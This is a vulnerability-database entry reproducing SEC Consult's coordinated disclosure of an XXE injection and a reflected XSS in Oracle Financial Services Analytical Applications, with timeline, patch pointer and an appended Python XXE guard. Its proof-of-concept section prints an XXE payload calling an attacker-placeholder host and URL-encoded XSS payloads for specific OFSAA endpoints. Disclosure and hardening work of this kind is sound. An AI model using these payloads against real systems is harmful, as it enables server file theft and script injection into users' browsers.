CVE-2018-2660 - Unspecified vulnerability in Oracle Financial Services Analytical Applications Infrastructure

CVSS 6.5 - MEDIUM
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: SINGLE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: PARTIAL
Tags: network, low complexity, oracle

Summary

Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure component of Oracle Financial Services Applications (subcomponent: Core). Supported versions that are affected are 7.3.5.x and 8.0.x. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. While the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Financial Services Analytical Applications Infrastructure accessible data as well as unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.0 Base Score 7.4 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L).

Packetstorm

data source: https://packetstormsecurity.com/files/download/146057/SA-20180123-0.txt
id: PACKETSTORM:146057
last seen: 2018-01-24
published: 2018-01-24
reporter: Samandeep Singh
source: https://packetstormsecurity.com/files/146057/Oracle-Financial-Services-Analytical-Applications-7.3.5.x-8.0.x-XXE-Injection-XSS.html
title: Oracle Financial Services Analytical Applications 7.3.5.x / 8.0.x XXE Injection / XSS

Seebug

bulletinFamily: exploit
description:

Vendor description:
-------------------
"Oracle is the unchallenged leader in Financial Services, with an integrated, best-in-class, end-to-end solution of intelligent software and powerful hardware designed to meet every financial service need."
Source: http://www.oracle.com/us/products/applications/financial-services/analytical-applications/index.html

Business recommendation:
------------------------
By exploiting the XXE vulnerability, an attacker can get read access to the filesystem of the server running the OFSAA web application and thus obtain sensitive information from it. It is also possible to bypass input validation checks in order to inject JavaScript code.

SEC Consult recommends installing the patched version immediately. Furthermore, a thorough security review should be performed by security professionals to identify potential further security issues.

Vulnerability overview/description:
-----------------------------------
#### 1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)
The web application allows users to import XML files. An attacker can import a specially crafted XML file and exploit the XXE vulnerability within the application.

#### 2) Reflected Cross Site Scripting (CVE-2018-2661)
This vulnerability allows an unauthenticated user to inject malicious client-side script which will be executed in the browser of a user who visits the manipulated URL.

Proof of concept:
-----------------
#### 1) XML External Entity Injection (XXE) (CVE-2018-2660)
For example, by importing the following XML code in the "Business Model Upload" function, a connection request from the server to the attacker's system will be made.

```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://[IP:port]/" >
]>
<foo>&xxe;</foo>
```

`IP:port` = IP address and port where the attacker is listening for connections

Furthermore, some files can be exfiltrated to remote servers via the techniques described in:
* https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
* http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

#### 2) Reflected Cross Site Scripting (CVE-2018-2661)
The following parameters have been found to be vulnerable to reflected cross site scripting attacks. Furthermore, there are many more vulnerable parameters. The following payload shows a simple alert message box:

```
URL     : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=
METHOD  : GET
PAYLOAD : winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E
```

```
URL     : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?url=fetchErrorMessages.action&infodom=OCBCOFSAASG&formCode=summarypage&errorMessage={62}~
METHOD  : GET
PAYLOAD : errorMessage={62}~%27;alert%0a(0);//&aType=DeleteConfirm
```

Vulnerable / tested versions:
-----------------------------
The following version has been tested, which was the most recent one when the vulnerabilities were discovered:
* Oracle Financial Services Analytical Applications 8.0.4.0.0

According to Oracle, all versions 7.3.5.x and 8.0.x before CPU January 2018 are affected.

Vendor contact timeline:
------------------------
* 2017-09-11: Contacting vendor through encrypted email ([email protected])
* 2017-09-20: Vendor requested to postpone the release date
* 2018-01-13: Vendor informed that the Critical Patch Update that includes fixes for the reported issues will be released on 2018-01-16. CVE-2018-2660 & CVE-2018-2661 were assigned for the issues
* 2018-01-23: Public disclosure of advisory

Solution:
---------
Apply the patch update in the January 2018 Critical Patch Update:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
id: SSV:97124
last seen: 2018-02-03
modified: 2018-02-02
published: 2018-02-02
reporter: Root
title: Oracle Financial Services Analytical Applications 7.3.5.x / 8.0.x XXE Injection (CVE-2018-2660) / XSS (CVE-2018-2661)
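The XXE in the advisory is a parser-configuration flaw: an import endpoint such as "Business Model Upload" has to refuse DOCTYPE and entity declarations before the parser can resolve anything. The following Python, added here and not part of the advisory or of OFSAA, shows such a pre-parse guard built on expat's declaration callbacks, run against the advisory's own proof-of-concept (with a constructed documentation address in place of `[IP:port]`) and against a benign upload.

```python
"""Pre-parse guard for untrusted XML uploads (added example, not OFSAA code).

Any DOCTYPE, entity declaration or external entity reference aborts the parse
before expat could resolve it, so the advisory's XXE payload is refused while
an ordinary document is parsed normally.
"""
import xml.parsers.expat as expat


class UnsafeXmlError(ValueError):
    """Raised when a document carries a DOCTYPE or entity declaration."""


# Constructed samples: the advisory's XXE proof-of-concept, with the RFC 5737
# documentation address 192.0.2.1 standing in for [IP:port], and a benign file.
XXE_SAMPLE = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>'
    '<!DOCTYPE foo [ <!ELEMENT foo ANY >'
    '<!ENTITY xxe SYSTEM "http://192.0.2.1:8080/" >]><foo>&xxe;</foo>'
)
BENIGN_SAMPLE = '<?xml version="1.0"?><model><entity name="Customer"/></model>'


def parse_untrusted_xml(data: str) -> dict:
    """Parse data with expat; return element counts or raise UnsafeXmlError."""
    counts: dict = {}
    parser = expat.ParserCreate()

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError(f"DOCTYPE {name!r} is not allowed in uploads")

    def forbid_entity(name, *decl):
        raise UnsafeXmlError(f"entity declaration {name!r} is not allowed")

    def forbid_external(context, base, system_id, public_id):
        raise UnsafeXmlError(f"external entity {system_id!r} is not allowed")

    # Declaration callbacks fire before any entity is expanded or fetched.
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external
    parser.StartElementHandler = (
        lambda name, attrs: counts.__setitem__(name, counts.get(name, 0) + 1)
    )
    parser.Parse(data, True)
    return counts


def is_safe_upload(data: str) -> bool:
    """True only when the upload parses without DOCTYPE/entity declarations."""
    try:
        parse_untrusted_xml(data)
    except (UnsafeXmlError, expat.ExpatError):
        return False
    return True
```

In a Java/JSP application like OFSAA the equivalent guard is enabling the `http://apache.org/xml/features/disallow-doctype-decl` feature on the DocumentBuilderFactory or SAXParserFactory used for the import.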